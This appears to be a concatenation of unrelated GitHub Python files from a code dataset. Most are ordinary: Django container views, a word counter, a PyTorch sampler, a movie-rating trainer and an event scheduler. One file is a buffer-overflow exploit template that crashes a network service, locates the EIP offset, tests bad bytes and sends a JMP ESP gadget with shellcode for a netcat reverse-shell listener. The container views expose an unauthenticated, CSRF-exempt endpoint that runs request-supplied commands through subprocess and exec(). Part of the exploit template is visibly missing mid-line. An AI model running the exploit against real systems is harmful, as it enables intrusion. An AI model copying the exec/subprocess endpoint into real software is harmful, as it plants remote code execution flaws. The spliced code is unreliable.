Pool.objects.get(name=server)\n o_ip = get_ip_by_name(server)\n try:\n client_server = create_client(o_ip)\n containers[server] = dict()\n all_obj_server = Container.objects.filter(pool=pk_server)\n for o in all_obj_server:\n if o.full_network_info is not None:\n o.full_network_info = json.loads(o.full_network_info)\n\n containers[\n server] = all_obj_server # client_server.containers.all()\n except Exception as e:\n message += \"
  • Error obtaining the containers list on server\" \\\n \" {}: {}
  • \".format(o_ip, str(e))\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n params = {\"containers\": containers,\n \"servers\": servers,\n \"message\": message,\n \"title\": \"Containers\",\n \"alert_type\": alert}\n return HttpResponse(template.render(params, request))\n\n\ndef containers_start(request, xhost, container_name):\n host = get_ip_by_name(xhost)\n try:\n client_server = create_client(host)\n container = client_server.containers.get(container_name)\n result = container.start(wait=True)\n cont_obj = Container.objects.get(name=container_name,\n pool=Pool.objects.get(name=xhost))\n cont_obj.status = container.status\n cont_obj.save()\n message = \"Container started successful.\"\n alert = alert_type(\"success\")\n except Exception as e:\n message = \"Container error to start: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n return containers_list(request, message, alert)\n\n\ndef containers_stop(request, xhost, container_name):\n host = get_ip_by_name(xhost)\n try:\n client_server = create_client(host)\n container = client_server.containers.get(container_name)\n result = container.stop(wait=True)\n cont_obj = Container.objects.get(name=container_name,\n pool=Pool.objects.get(name=xhost))\n cont_obj.status = container.status\n cont_obj.save()\n message = \"Container stopped successful.\"\n alert = alert_type(\"success\")\n except Exception as e:\n message = \"Container error stop: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n return containers_list(request, message, alert)\n\n\ndef containers_delete(request, xhost, container_name):\n host = get_ip_by_name(xhost)\n try:\n client_server = create_client(host)\n container = client_server.containers.get(container_name)\n result = container.delete(wait=True)\n Container.objects.get(pool=Pool.objects.get(name=xhost),\n name=container_name).delete()\n message = \"Container deleted successfully.\"\n alert = alert_type(\"success\")\n except Exception as e:\n message = \"Container error to delete: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n return containers_list(request, message, alert)\n\n\ndef containers_freeze(request, xhost, container_name):\n host = get_ip_by_name(xhost)\n try:\n client_server = create_client(host)\n container = client_server.containers.get(container_name)\n result = container.freeze(wait=True)\n cont_obj = Container.objects.get(name=container_name,\n pool=Pool.objects.get(name=xhost))\n cont_obj.status = container.status\n cont_obj.save()\n message = \"Container frozen successful.\"\n alert = alert_type(\"success\")\n except Exception as e:\n message = \"Container error to frozen: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n return containers_list(request, message, alert)\n\n\ndef containers_new(request):\n servers = None\n images = None\n message = \"\"\n alert = \"\"\n try:\n servers = get_server_list()\n except Exception as e:\n message += \"Error getting the server list: {}.\".format(e)\n alert = alert_type(\"error\")\n\n try:\n images = get_images_list()\n except Exception as e:\n message += \"Error getting the images list: {}.\".format(e)\n alert = alert_type(\"error\")\n\n template = loader.get_template(\"core/new_container.html\")\n params = {\"servers\": servers,\n \"images\": images,\n \"message\": message,\n \"alert_type\": alert}\n return HttpResponse(template.render(params, request))\n\n\ndef containers_add(request):\n message = \"\"\n a_type = alert_type(\"success\")\n container_name = str(request.POST.get(\"container_name\"))\n xserver = str(request.POST.get(\"server\"))\n image_type = str(request.POST.get(\"image_type\"))\n profile = str(request.POST.get(\"profile\"))\n wait_creation = bool(request.POST.get(\"wait_creation\"))\n values = []\n config = {\"name\": container_name,\n \"source\": {\"server\": \"https://\" + IMAGE_HOST + \":8443\",\n \"protocol\": \"lxd\",\n \"type\": \"image\",\n \"mode\": \"pull\",\n \"fingerprint\": image_type}\n }\n server = get_ip_by_name(xserver)\n try:\n client_server = create_client(server)\n print(\"HERE!\")\n container = client_server.containers.create(config, wait=wait_creation)\n print(\"HERE\")\n container.start()\n message = \"Container created sucessfully, go to admin container go \" \\\n \"to Containers list\"\n Container(name=container_name,\n pool=Pool.objects.get(name=xserver),\n status=container.status).save()\n except Exception as e:\n message = \"Container creation error: \" + str(\n e) + \" / \" + server + \" / \" + xserver\n a_type = alert_type(\"error\")\n\n servers = get_server_list()\n images = get_images_list()\n params = {\"servers\": servers,\n \"images\": images,\n \"values\": values,\n \"message\": message,\n \"alert_type\": a_type}\n template = loader.get_template(\"core/new_container.html\")\n return HttpResponse(template.render(params, request))\n\n\ndef containers_migrate(request, origin, name_container, destination):\n ip_origin = get_ip_by_name(origin)\n ip_destination = get_ip_by_name(destination)\n try:\n client_origin = create_client(ip_origin)\n container = client_origin.containers.get(name_container)\n client_destination = create_client(ip_destination)\n container.migrate(client_destination, wait=True)\n container = client_origin.containers.get(name_container)\n container.delete(wait=True)\n cont_obj = Container.objects.get(name=name_container,\n pool=Pool.objects.get(name=origin))\n cont_obj.pool = Pool.objects.get(name=destination)\n cont_obj.save()\n message = \"Container migration successful.\"\n alert = alert_type(\"success\")\n except Exception as e:\n message = \"Container migration error: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n return containers_list(request, message, alert)\n\n\ndef containers_terminal(request, server, container_name):\n server_socket = request.get_host().replace(\":\" + request.get_port(), \"\")\n container_address = get_ip_by_name(server) + \"/\" + container_name\n template = loader.get_template(\"core/terminal.html\")\n return HttpResponse(template.render({\"container_address\": container_address,\n \"server_socket\": server_socket,\n \"container_name\": container_name},\n request))\n\n\ndef containers_info(request, xhost, container_name):\n host = get_ip_by_name(xhost)\n template = loader.get_template(\"core/container_info.html\")\n try:\n client_server = create_client(host)\n container = Container.objects.get(name=container_name, pool=xhost)\n if container.full_network_info is not None:\n container.full_network_info = json.loads(\n container.full_network_info)\n except Exception as e:\n container = None\n message = \"Error deleting container: \" + str(e)\n alert = alert_type(\"error\")\n\n # Stacktrace\n colorama.Fore.RED + traceback.format_exc() + colorama.Fore.RESET\n\n params = {\"container\": container,\n \"title\": \"Container information\"}\n return HttpResponse(template.render(params, request))\n\n\ndef containers_unfreeze(request, xhost, container_name):\n a_type = alert_type(\"success\")\n host = get_ip_by_name(xhost)\n try:\n client_server = create_client(host)\n container = client_server.containers.get(container_name)\n result = container.unfreeze(wait=True)\n cont_obj = Container.objects.get(name=container_name,\n pool=Pool.objects.get(name=xhost))\n cont_obj.status = container.status\n cont_obj.save()\n message = \"Container unfreeze successful\"\n except Exception as e:\n message = \"Container error unfreeze: \" + str(e)\n a_type = alert_type(\"error\")\n\n return containers_list(request, message, a_type)\n\n\n@csrf_exempt\ndef api_execution(request):\n response = {}\n code = -1\n result = None\n try:\n ostring = request.body\n js = json.loads(ostring)\n\n oper = js[\"operation\"]\n\n if oper == \"copa_host_command\":\n command = js[\"cmd\"]\n if not isinstance(command, list):\n raise Exception(\"Parameter 'cmd' must be a list\")\n result = subprocess.check_output(command)\n\n elif oper == \"copa_module_execution\":\n pycom = js[\"method\"]\n args = js[\"args\"]\n if pycom == \"\":\n raise Exception(\"Error: You must select the procedure/function \"\n \"to be called!\")\n load_modules_from_dir(COPA_HOME + \"/containers_site/core/\"\n \"copa_modules/\")\n exec(\"result = modules.\" + pycom + \"( \" + args + \") \")\n\n else:\n x_server = get_ip_by_name(js[\"container_pool\"])\n server = create_client(x_server)\n\n if oper not in [\"create\", \"images_list\"]:\n x_container = js[\"container_name\"]\n db_container = Container.objects.get(name=x_container,\n pool=x_server)\n container = server.containers.get(x_container)\n\n if oper == \"start\":\n container.start(wait=True)\n db_container.status = container.status\n db_container.save()\n message = \"Container created successfully.\"\n\n elif oper == \"stop\":\n container.stop(wait=True)\n db_container.status = container.status\n db_container.save()\n message = \"Container stopped successfully.\"\n\n elif oper == \"freeze\":\n container.freeze(wait=True)\n db_container.status = container.status\n db_container.save()\n message = \"Container frozen successfully.\"\n\n elif oper == 'unfreeze':\n container.unfreeze(wait=True)\n db_container.status = container.status\n db_container.save()\n message = \"Container unfrozen successfully\"\n\n elif oper == \"delete\":\n container.delete(wait=True)\n db_container.status = container.status\n db_container.save()\n message = \"Container deleted successfully.\"\n\n elif oper == \"migrate\":\n ip_destination = get_ip_by_name(js[\"destination_pool\"])\n client_destination = create_client(ip_destination)\n container.migrate(client_destination, wait=True)\n message = \"Container migration successful.\"\n container = server.containers.get(x_container)\n container.delete(wait=True)\n db_container.pool = Pool.objects.get(\n name=js[\"destination_pool\"])\n db_container.status = container.status\n db_container.save()\n\n elif oper == \"information\":\n infos = container.state()\n result = dict()\n result[\"cpu\"] = infos.cpu # just available in lxd >= 2.19\n result[\"disk\"] = infos.disk\n result[\"memory\"] = infos.memory\n result[\"network\"] = infos.network\n\n elif oper == \"command_execution\":\n command = js[\"cmd\"]\n if not isinstance(command, list):\n raise Exception(\"Parameter 'cmd' must be a list\")\n result = container.execute(command)\n\n elif oper == \"create\":\n container_name = js[\"container_name\"]\n container_pool = get_ip_by_name(js[\"container_pool\"])\n image_type = js[\"image_type\"]\n values = []\n config = {\"name\": container_name,\n \"source\": {\n \"server\": \"https://\" + IMAGE_HOST + \":8443\",\n \"protocol\": \"\",\n \"type\": \"image\",\n \"mode\": \"pull\",\n \"fingerprint\": image_type}}\n client_server = create_client(container_pool)\n\n container = client_server.containers.create(config, wait=True)\n Container(name=container_name,\n pool=Pool.objects.get(name=container_pool),\n status=container.status).save()\n message = \"Container created successfully\"\n\n elif oper == \"images_list\":\n result = get_images_list()\n\n else:\n raise Exception(\"Unknown operation\")\n\n code = 0\n message = \"Process successful\"\n except Exception as e:\n message = \"COPA API error: \" + str(e)\n\n response[\"code\"] = code\n response[\"message\"] = message\n response[\"result\"] = result\n\n return JsonResponse(response, safe=False)\n","repo_name":"fernandaars/COPA","sub_path":"COPA_ufrgs/containers_site/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33205543694","text":"import sys\n\n\ndef build_dict(filepath):\n\n word_freq = {}\n with open(filepath) as text_file:\n for line in text_file:\n words = line.lower().split()\n for word in words:\n word_freq[word] = word_freq.get(word, 0) + 1\n '''\n # above line is same as below\n if word in word_freq:\n word_freq[word] += 1\n else:\n word_freq[word] = 1\n '''\n return word_freq\n\n\ndef print_words(filepath):\n\n word_freq = build_dict(filepath)\n for word, freq in sorted(word_freq.items()):\n print(word + ' ' + str(freq))\n\n\ndef print_top(filepath):\n\n word_freq = build_dict(filepath)\n sorted_dict = sorted(word_freq.items(), key=lambda w: w[-1], reverse=True)\n for word, freq in sorted_dict[:20]:\n print(word + ' ' + str(freq))\n\n# This basic command line argument parsing code is provided and calls the\n# print_words() and print_top() functions which you must define.\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print('usage: ./wordcount.py {--count|--topcount} file')\n sys.exit(1)\n\n OPTION = sys.argv[1]\n FILEPATH = sys.argv[2]\n if OPTION == '--count':\n print_words(FILEPATH)\n elif OPTION == '--topcount':\n print_top(FILEPATH)\n else:\n print('unknown option: ' + OPTION)\n sys.exit(1)\n","repo_name":"hamstache/PythonScripts","sub_path":"word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25142150338","text":"from __future__ import absolute_import\nfrom collections import defaultdict\nimport numpy as np\nimport torch\n\nclass RandomIdentitySampler(torch.utils.data.Sampler):\n# class RandomIdentitySampler(torch.utils.data.sampler.Sampler):\n \"\"\"\n Randomly sample N identities, then for each identity,\n randomly sample K instances, therefore batch size is N*K.\n\n Code imported from https://github.com/Cysu/open-reid/blob/master/reid/utils/data/sampler.py.\n\n Args:\n data_source (Dataset): dataset to sample from.\n num_instances (int): number of instances per identity.\n \"\"\"\n def __init__(self, data_source, num_instances=4):\n self.data_source = data_source\n self.num_instances = num_instances\n self.index_dic = defaultdict(list)\n for index, (_, pid, _) in enumerate(data_source):\n self.index_dic[pid].append(index)\n self.pids = list(self.index_dic.keys())\n self.num_identities = len(self.pids)\n\n def __iter__(self):\n indices = torch.randperm(self.num_identities)\n ret = []\n for i in indices:\n pid = self.pids[i]\n t = self.index_dic[pid]\n replace = False if len(t) >= self.num_instances else True\n t = np.random.choice(t, size=self.num_instances, replace=replace)\n ret.extend(t)\n return iter(ret)\n\n def __len__(self):\n return self.num_identities * self.num_instances\n","repo_name":"mangye16/ReID-Survey","sub_path":"video-reid-AWG/samplers.py","file_name":"samplers.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":577,"dataset":"github-code","pt":"32"} +{"seq_id":"27212417289","text":"# coding: utf-8\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n # ex: /polls/5/results/\n url(r'^(?P[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n # ex: /polls/5/vote/\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n]\n#url()中第一项是域名的匹配,尖括号中是views带来的信息, 第二项是与调用view参数,第三项是name,其他模板通过命名来引用URL\n#让主URLconf可以链接到polls.urls模块。在mysite/urls.py中插入一个include():","repo_name":"forgoodsj/mysite","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18867077046","text":"\"\"\"A script to train vectors and biases for users and movies.\"\"\"\n\nimport argparse\nfrom collections import namedtuple\nfrom bisect import bisect_left\nimport csv\nimport logging\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\n# arguments\n# ---------\n\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument(\n '-d', '--dim', type=int, default=20, help='dimensionality of learnt vectors')\nparser.add_argument(\n '-e', '--epochs', type=float, default=1.0, help='training epochs (a fraction is also allowed)')\nparser.add_argument(\n '-s', '--test-split', type=float, default=0.25, help='fraction of instances in test split')\nparser.add_argument(\n '--track-loss', type=int, default=None, help='track stochastic loss after every given number of iterations')\nparser.add_argument(\n '--eta-bu', type=float, default=0.1, help='learning rate for user biases')\nparser.add_argument(\n '--eta-bm', type=float, default=0.1, help='learning rate for movie biases')\nparser.add_argument(\n '--eta-vu', type=float, default=0.1, help='learning rate for user vectors')\nparser.add_argument(\n '--eta-vm', type=float, default=0.1, help='learning rate for movie vectors')\nparser.add_argument(\n '--lambda-bu', type=float, default=0.01, help='regularization penalty for user biases')\nparser.add_argument(\n '--lambda-bm', type=float, default=0.01, help='regularization penalty for movie biases')\nparser.add_argument(\n '--lambda-vu', type=float, default=0.01, help='regularization penalty for user vectors')\nparser.add_argument(\n '--lambda-vm', type=float, default=0.01, help='regularization penalty for movie vectors')\nargs = parser.parse_args()\n\nif args.track_loss is not None:\n logging.basicConfig(filename='train.log', filemode='w', level=logging.INFO)\n\n\n# rating data\n# -----------\n\nRating = namedtuple('Rating', ['user', 'movie', 'value'])\n\ntrain_data, test_data = [], []\ns = 1\n\nprint('Loading rating data ... ')\nrating_dir = 'dataset'\n\nfiles = os.listdir(rating_dir)\nfiles_with_progress_bar = tqdm(files, desc='files')\n\nfor filename in files_with_progress_bar:\n\n movie = filename\n movie = movie[:movie.index('.txt')] # remove the .txt extension\n\n with open(os.path.join(rating_dir, filename), 'r') as f:\n reader = csv.reader(f)\n\n for row in reader:\n user, value = row[0], int(row[1])\n rating = Rating(user, movie, value)\n \n # random seed for reproducibility\n # a different random seed for each sample so that the outcome\n # is different (but still reproducible) each time\n random.seed(20 * s)\n s += 1\n\n if random.random() <= args.test_split:\n test_data.append(rating)\n else:\n train_data.append(rating)\n\n\nprint('{} total.'.format(len(train_data) + len(test_data)))\nprint(\n 'Split into training data with {} ratings and test data with {} ratings.'.format(len(train_data), len(test_data)))\n\nmovie_names = sorted(set(r.movie for r in train_data + test_data))\nuser_ids = sorted(set(r.user for r in train_data + test_data))\nM, U = len(movie_names), len(user_ids)\n\n\n# training\n# --------\n\nmu = np.mean([r.value for r in train_data])\nuser_biases, movie_biases = np.zeros((U,)), np.zeros((M,))\n\nnp.random.seed(10)\nuser_vecs = np.random.randn(U, args.dim) * 0.01\n\nnp.random.seed(20)\nmovie_vecs = np.random.randn(M, args.dim) * 0.01\n\nepoch = 0\ntrain, calc_train_rmse, calc_test_rmse = True, False, False\n\ns = 1\n\n# adagrad memory matrices\nmem_user_biases = np.zeros_like(user_biases)\nmem_movie_biases = np.zeros_like(movie_biases)\nmem_user_vecs = np.zeros_like(user_vecs)\nmem_movie_vecs = np.zeros_like(movie_vecs)\n\nprint('Performing stochastic gradient descent (with adagrad update) ...')\n\nwhile True:\n\n if train:\n # parameters are being trained\n data = train_data\n\n if epoch == args.epochs:\n # training is done, move to calculating training RMSE\n calc_train_rmse = True\n train = False\n rmse = 0.0\n\n if args.track_loss is not None:\n print('Loss logged to train.log.')\n\n print('Calculating training RMSE ...')\n\n elif args.epochs - epoch < 1.0:\n # less than one epoch of training left\n iters = int((args.epochs - epoch) * len(data))\n data = data[:iters]\n epoch = args.epochs\n\n else:\n # one more epoch of training\n epoch += 1\n\n # random seed for reproducibility\n # a different random seed for each epoch so that the shuffling\n # is different (but still reproducible) each time\n random.seed(10 * s)\n s += 1\n\n random.shuffle(data)\n\n\n elif calc_train_rmse:\n # training RMSE has been calculated\n # rather training SSE has been calculated, convert it to RMSE\n train_rmse = np.sqrt(rmse / len(train_data))\n print(f'Training RMSE: {train_rmse:.6f}')\n\n # move to calculating test RMSE\n data = test_data\n calc_test_rmse = True\n calc_train_rmse = False\n rmse = 0.0\n print('Calculating test RMSE ...')\n\n elif calc_test_rmse:\n # test RMSE - rather SSE - has been calculated, convert it to RMSE\n test_rmse = np.sqrt(rmse / len(test_data))\n print(f'Test RMSE: {test_rmse:.6f}')\n break\n\n\n data_with_progress_bar = tqdm(\n enumerate(data),\n desc='iterations', total=len(data)\n )\n\n for idx, rating in data_with_progress_bar:\n\n # bisect_left performs binary search, which is much, much faster than\n # calling .index() on a list and performing linear search.\n u = bisect_left(user_ids, rating.user)\n m = bisect_left(movie_names, rating.movie)\n\n true = rating.value # true rating value\n\n # predicted rating value\n pred = (mu + user_biases[u] + movie_biases[m]\n + np.dot(user_vecs[u], movie_vecs[m]))\n\n loss = (true - pred) ** 2\n\n if calc_train_rmse or calc_test_rmse:\n rmse += loss\n continue\n\n # calculated gradients\n grad_user_bias = (pred - true) + (args.lambda_bu * user_biases[u])\n grad_movie_bias = (pred - true) + (args.lambda_bm * movie_biases[m])\n grad_user_vec = (pred - true) * movie_vecs[m] + (args.lambda_vu * user_vecs[u])\n grad_movie_vec = (pred - true) * user_vecs[u] + (args.lambda_vm * movie_vecs[m])\n\n # update memory matrices\n mem_user_biases[u] += grad_user_bias ** 2\n mem_movie_biases[m] += grad_movie_bias ** 2\n mem_user_vecs[u] += grad_user_vec ** 2\n mem_movie_vecs[m] += grad_movie_vec ** 2\n\n # adagrad updates\n user_biases[u] -= args.eta_bu / np.sqrt(mem_user_biases[u] + 1e-8) * grad_user_bias\n movie_biases[m] -= args.eta_bm / np.sqrt(mem_movie_biases[m] + 1e-8) * grad_movie_bias\n user_vecs[u] -= args.eta_vu / np.sqrt(mem_user_vecs[u] + 1e-8) * grad_user_vec\n movie_vecs[m] -= args.eta_vm / np.sqrt(mem_movie_vecs[m] + 1e-8) * grad_movie_vec\n\n if args.track_loss is not None:\n if (idx + 1) % args.track_loss == 0:\n logging.info(f'epoch {epoch} iteration {idx + 1}: loss {loss:.6f}')\n\n\n# save parameters\n# ---------------\n\nwith open('params.pkl', 'wb') as f:\n pickle.dump(\n {\n 'mu': mu,\n 'user_biases': user_biases,\n 'movie_biases': movie_biases,\n 'user_vecs': user_vecs,\n 'movie_vecs': movie_vecs,\n 'user_ids': user_ids,\n 'movie_names': movie_names\n }, f)\n\nprint('Trained parameters saved to params.pkl')\n","repo_name":"codeandfire/movievecs","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31346764277","text":"#!/usr/bin/env python3\nfrom struct import pack\nimport shlex\nfrom time import sleep\nfrom subprocess import check_output\nimport socket\nimport argparse\n\n\nVICTIM_IP = \"10.10.10.10\"\nVICTIM_PORT = 1337\n\nLHOST = \"10.0.0.1\"\nLPORT = 443\n\nEIP_OFFSET = 0\nBAD_BYTES = b\"\\x00\"\nJMP_ESP = 0x0\n\n\ndef main():\n # This script is used in stages. Uncomment each function in turn, adjusting\n # global constants at top of file as necessary.\n # To make mona easier to work with, set a custom working folder:\n # !mona config -set workingfolder c:\\mona\\%p\n\n cause_crash()\n\n # find_offset(2048)\n\n # confirm_offset()\n\n # find_bad_bytes()\n\n # do_exploit()\n\n print(\"[+] DONE!\")\n\n\ndef send_payload(payload):\n \"\"\"\n This is the core function to send your payloads.\n\n Change it for any new binary so that it properly interacts with the target\n network service.\n \"\"\"\n addr = (VICTIM_IP, VICTIM_PORT)\n timeout = 2 # seconds\n prefix = b\"START \"\n suffix = b\"\\r\\n\"\n payload = prefix + payload + suffix\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.settimeout(timeout)\n s.connect(addr)\n s.recv(2048) # recieve intro banner\n s.recv(2048) # recieve prompt\n print(f\"[*] Sending {len(payload)} bytes to {VICTIM_IP}:{VICTIM_PORT}\")\n s.send(payload) # try to recieve response\n s.recv(2048)\n\n\ndef p32(val):\n \"\"\"Pack a little endian 32-bit integer\"\"\"\n return pack(\"\\bytearray.bin -a
    \n # Not all of these might be badchars! Sometimes badchars cause the next\n # byte to get corrupted as well, or even effect the rest of the string.\n # The first badchar in the list should be the null byte (\\x00) since we\n # already removed it from the file. Make a note of any others. Generate a\n # new bytearray in mona, specifying these new badchars along with \\x00.\n # Repeat the badchar comparison until the results status returns\n # \"Unmodified\". This indicates that no more badchars exist.\n test_connection()\n allowed = gen_bytes(bad_bytes=BAD_BYTES)\n padding = b\"A\" * EIP_OFFSET\n payload = padding\n payload += b\"BBBB\"\n payload += allowed\n try:\n send_payload(payload)\n except socket.timeout:\n print(\"[*] Now use these commands and check for 'Unmodified' status:\")\n print(f'!mona bytearray -b \"{hexbytes(BAD_BYTES)}\"')\n print(\"!mona compare -f C:\\\\mona\\\\bytearray.bin -a ESP_ADDR\")\n else:\n print(\"[x] Connection didn't hang. Check your send_payload() function\")\n exit(1)\n\n\ndef get_shellcode():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\",\n \"--file\",\n type=argparse.FileType(\"rb\"),\n help=\"Path to binary file containing raw shellcode bytes\",\n )\n args = parser.parse_args()\n if args.file is not None:\n shellcode = args.file.read()\n args.file.close()\n else:\n shellcode = gen_shellcode(bad_bytes=BAD_BYTES)\n return shellcode\n\n\ndef do_exploit():\n # to find jmp_esp, use the following mona command: (-cpb avoids bad ptr bytes)\n # !mona jmp -r esp -cpb '\\x00...'\n # or look for specific instruction:\n # !mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb \"\\x00\\x0a\\x0d\"\n test_connection()\n if not JMP_ESP:\n print(\"[*] Use the following to get a jmp-esp gadget:\")\n print(f\"!mona jmp -r esp -cpb '{hexbytes(BAD_BYTES)}'\")\n print(\"[*] AND START YOUR NETCAT LISTENER!\")\n print(f\"sudo nc -lvnp {LPORT}\")\n exit(1)\n\n padding = b\"A\" * EIP_OFFSET\n nopsled = b\"\\x90\" * 32 # to handle encoders\n shellcode = get_shellcode()\n\n payload = padding\n payload += p32(JMP_ESP)\n payload += nopsled\n payload += shellcode\n print(\"[*] Sending exploit payload. Hopefully you have a listener ready!\")\n try:\n send_payload(payload)\n except socket.timeout:\n pass\n else:\n print(\"[x] Connection didn't hang. Check your send_payload() function\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"camercu/oscp-prep","sub_path":"tools/win/pwn-bof-template.py","file_name":"pwn-bof-template.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"32"} +{"seq_id":"69980675292","text":"from .conditional import ConditionalBlock, ConditionalTCNBlock\nfrom .dcrnn import DCRNNCell, DCRNN\nfrom .dense_dcrnn import DenseDCRNNCell, DenseDCRNN\nfrom .gcgru import GraphConvGRUCell, GraphConvGRU\nfrom .gclstm import GraphConvLSTMCell, GraphConvLSTM\nfrom .mlp import MLP, ResidualMLP\nfrom .rnn import RNN\nfrom .stcn import SpatioTemporalConvNet\nfrom .tcn import TemporalConvNet\nfrom .transformer import (TransformerLayer, SpatioTemporalTransformerLayer,\n Transformer)\n\ngeneral_classes = [\n 'ConditionalBlock',\n 'ConditionalTCNBlock',\n 'MLP',\n 'ResidualMLP',\n 'RNN',\n]\n\ncell_classes = [\n 'DCRNNCell',\n 'DenseDCRNNCell',\n 'GraphConvGRUCell',\n 'GraphConvLSTMCell'\n]\n\ngrnn_classes = [\n 'DCRNN',\n 'DenseDCRNN',\n 'GraphConvGRU',\n 'GraphConvLSTM'\n]\n\nconv_classes = [\n 'TemporalConvNet',\n 'SpatioTemporalConvNet'\n]\n\ntransformer_classes = [\n 'TransformerLayer',\n 'SpatioTemporalTransformerLayer',\n 'Transformer'\n]\n\nclasses = [\n *general_classes,\n *cell_classes,\n *grnn_classes,\n *conv_classes,\n *transformer_classes\n]\n\n__all__ = classes\n","repo_name":"Graph-Machine-Learning-Group/sgp","sub_path":"tsl/nn/blocks/encoders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"72554343772","text":"#!/usr/bin/python3\nfrom __future__ import print_function, absolute_import\nfrom threading import Thread, Event\nfrom datetime import datetime, timedelta\n\nlistenPort = 9993\n\ndef singleton(cls):\n\tinstances = {}\n\tdef getinstance():\n\t\tif cls not in instances:\n\t\t\tinstances[cls] = cls()\n\t\treturn instances[cls]\n\treturn getinstance\n\nclass eventInfo(object):\n\tdef __init__(self, reached=False, new_delta=0, skew=0):\n\t\tself.reached = reached\n\t\tself.delta = new_delta\n\t\tself.skew = skew\n\nclass event(object):\n\tevent_dispatcher = 'scheduler'\n\tdef __init__(self, _time=None, t='', args=None, _id=0):\n\t\tself.time = _time\n\t\tself.cur = datetime.now()\n\t\tself.dtime = self.cur\n\t\tself.last = None\n\t\tself.id = _id\n\t\tself.args = args\n\t\tself.type = t\n\t\tself.active = True\n\t\tself.recalc = self.__getattribute__(t)\n\n\tdef __str__(self):\n\t\treturn \"\" % (str(self.time), self.op)\n\n\tdef every(self, new):\n\t\tif new >= self.dtime:\n\t\t\told = self.dtime\n\t\t\tself.dtime = self.cur\n\t\t\twhile self.dtime < new:\n\t\t\t\tself.dtime += self.time\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.dtime - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.dtime - new)\n\n\tdef daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tself.time += timedelta(days=1)\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.time - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.time - new)\n\n\tdef reg_daily(self, new):\n\t\tif new > self.time:\n\t\t\told = self.time\n\t\t\tif new.isoweekday() < 5:\n\t\t\t\tself.time += timedelta(days=1)\n\t\t\telse:\n\t\t\t\tself.time += timedelta(days=8-new.isoweekday())\n\t\t\tself.last = datetime.now()\n\t\t\treturn eventInfo(True, self.time - new, old - new)\n\t\telse:\n\t\t\treturn eventInfo(False, self.time - new)\n\n@singleton\nclass eventScheduler(Thread):\n\tdef __init__(self):\n\t\tThread.__init__(self)\n\t\tself.wait_event = Event()\n\t\tself.event_list = []\n\t\tself.event_id = 0\n\t\tself.listeners = []\n\t\tself.daemon = True\n\t\tself.start()\n\n\tdef wake(self):\n\t\tself.wait_event.set()\n\n\tdef listen(self, cb):\n\t\tself.listeners.append(cb)\n\n\tdef unlisten(self, cb):\n\t\tself.listeners.remove(cb)\n\n\tdef activeEvents(self):\n\t\tactive = 0\n\t\tfor ev in self.event_list:\n\t\t\tif ev.active: active+=1\n\t\treturn active\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tnext = self.handleEvents()\n\t\t\tif next != None:\n\t\t\t\tnext = next.total_seconds()\n\t\t\t\tprint('[SCHEDULER] %d event(s) queued, next wake-up: %fs' % (self.activeEvents(), next))\n\t\t\telse:\n\t\t\t\tprint('[SCHEDULER] No events queued, waiting for condition.')\n\t\t\tself.wait_event.wait(next)\n\t\t\tself.wait_event.clear()\n\n\tdef disableEvent(self, ev):\n\t\tev.active = False\n\t\tself.wake()\n\n\tdef enableEvent(self, ev):\n\t\tev.active = True\n\t\tself.wake()\n\n\tdef clearEvent(self, ev):\n\t\tself.event_list.remove(ev)\n\t\tself.wake()\n\n\tdef createEvent(self, event):\n\t\tself.event_list.append(event)\n\t\tself.wake()\n\t\tself.event_id += 1\n\t\tevent.id = self.event_id\n\t\treturn event\n\n\tdef handleEvents(self):\n\t\tcur = datetime.now()\n\t\tnext = None\n\t\tx = self.event_list\n\t\tfor ev in x:\n\t\t\tif 